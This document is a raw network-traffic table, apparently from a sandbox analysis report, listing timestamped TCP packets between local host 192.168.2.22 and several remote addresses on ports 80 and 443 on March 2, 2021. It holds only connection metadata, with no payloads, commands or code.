Mar 2, 2021 20:23:38.758411884 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.758434057 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.759252071 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.759274006 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.759285927 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.759296894 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.759309053 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.759371042 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.760137081 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.760159016 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.760170937 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.760184050 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.760199070 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.760225058 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.760240078 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.761029959 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.761054039 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.761076927 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.761095047 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.761106014 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.761110067 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.761120081 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.761147022 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.761178017 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.762128115 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.762149096 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.762222052 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.788681984 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.788707018 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.788727045 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.788743973 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.788760900 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.788759947 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.788777113 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.788784027 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.788794041 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.788809061 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.788810015 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.788825035 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.788849115 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.789077044 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.789094925 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.789110899 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.789120913 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.789132118 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.789150000 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.789150000 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.789165974 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.789184093 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.789191961 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.789221048 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.789223909 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.789241076 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.789273024 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.790009022 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790028095 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790045977 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790060997 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790071964 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.790076971 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790096998 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790097952 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.790115118 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790141106 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.790707111 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790725946 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790740967 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790754080 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.790759087 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790776014 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790776968 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.790791988 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790807962 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790807962 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.790824890 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790843964 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.790854931 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.791688919 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.791704893 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.791722059 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.791738033 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.791745901 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.791754007 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.791764021 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.791769981 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.791785955 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.791793108 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.791805983 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.791822910 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.791832924 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.791867018 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.792670012 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.792687893 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.792706013 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.792725086 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.792740107 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.792747974 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.792762995 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.792768002 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.792783022 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.792794943 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.792799950 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.792815924 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.792839050 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.793664932 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.793684006 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.793700933 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.793720007 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.793735981 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.793745995 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.793756008 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.793757915 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.793773890 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.793776989 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.793791056 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.793807030 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.793817043 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.793857098 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.794589996 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.794608116 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.794625044 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.794641972 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.794658899 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.794667959 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.794675112 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.794687033 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.794694901 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.794713974 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.794718981 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.794729948 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.794758081 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.795535088 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.795553923 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.795564890 CET	80	49176	104.21.59.148	192.168.2.22
Mar 2, 2021 20:23:38.795588970 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:38.795610905 CET	49176	80	192.168.2.22	104.21.59.148
Mar 2, 2021 20:23:39.098963976 CET	49177	80	192.168.2.22	99.86.159.34
Mar 2, 2021 20:23:39.141011953 CET	80	49177	99.86.159.34	192.168.2.22
Mar 2, 2021 20:23:39.141094923 CET	49177	80	192.168.2.22	99.86.159.34
Mar 2, 2021 20:23:39.141524076 CET	49177	80	192.168.2.22	99.86.159.34
Mar 2, 2021 20:23:39.183470011 CET	80	49177	99.86.159.34	192.168.2.22
Mar 2, 2021 20:23:39.188811064 CET	80	49177	99.86.159.34	192.168.2.22
Mar 2, 2021 20:23:39.347704887 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.383827925 CET	49177	80	192.168.2.22	99.86.159.34
Mar 2, 2021 20:23:39.392123938 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.392236948 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.393019915 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.435000896 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.435280085 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.435337067 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.435388088 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.435408115 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.437550068 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.437653065 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.447369099 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.489409924 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.489905119 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.495663881 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.537647009 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.933106899 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.933136940 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.933161020 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.933185101 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.933227062 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.933300972 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.933310032 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.933334112 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.934533119 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.934561968 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.934643030 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.935692072 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.935719013 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.935803890 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.936672926 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.958683968 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.958712101 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.958899975 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.959168911 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.959250927 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.959316969 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.960973024 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.960989952 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.961178064 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.961587906 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.961940050 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.961961985 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.962028027 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.963159084 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.963180065 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.963380098 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.965539932 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.965557098 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.965748072 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.983051062 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.983083963 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.983325005 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.983555079 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.983584881 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.983659029 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.984725952 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.984770060 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.984865904 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.985908985 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.985939026 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.986028910 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.987086058 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.987126112 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.987206936 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.988246918 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.988285065 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.988378048 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.989456892 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.989515066 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.989590883 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.992187977 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.992227077 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.992270947 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.992310047 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.992367029 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:39.992938042 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.992976904 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:39.993037939 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.002227068 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.002265930 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.002450943 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.002731085 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.002774954 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.002981901 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.004053116 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.004106998 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.004213095 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.005172968 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.005213976 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.005304098 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.006654978 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.006752014 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.006844044 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.007412910 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.007433891 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.007514000 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.008589029 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.008611917 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.008702993 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.011554003 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.011583090 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.011702061 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.012125969 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.012253046 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.012320042 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.013278008 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.013299942 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.013387918 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.016221046 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.016386986 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.016536951 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.016552925 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.016660929 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.016712904 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.029165030 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.029191017 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.029206991 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.029220104 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.029248953 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.029266119 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.029403925 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.030468941 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.030489922 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.030580997 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.031629086 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.031646967 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.031749964 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.032716990 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.032807112 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.032890081 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.034147024 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.034203053 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.034281015 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.035351992 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.037760973 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.037868977 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.038474083 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.038516998 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.038582087 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.040172100 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.040222883 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.040361881 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.041593075 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.041631937 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.041682005 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.041718006 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.041723967 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.041778088 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.042788982 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.042825937 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.042912960 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.045980930 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.046030045 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.046145916 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.047346115 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.047389030 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.047480106 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.048636913 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.048683882 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.048773050 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.049016953 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.049058914 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.049148083 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.049813032 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.049856901 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.049968958 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.050971985 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.051009893 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.051121950 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.052593946 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.052634001 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.052726030 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.055365086 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.055408001 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.055444002 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.055483103 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.055511951 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.055522919 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.055531025 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.055571079 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.055619955 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.058603048 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.058645964 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.058828115 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.058957100 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.059333086 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.059421062 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.071510077 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.071568966 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.071660042 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.071820974 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.071862936 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.071928978 CET	49178	443	192.168.2.22	99.86.159.103
Mar 2, 2021 20:23:40.072365999 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.072408915 CET	443	49178	99.86.159.103	192.168.2.22
Mar 2, 2021 20:23:40.072463036 CET	49178	443	192.168.2.22	99.86.159.103
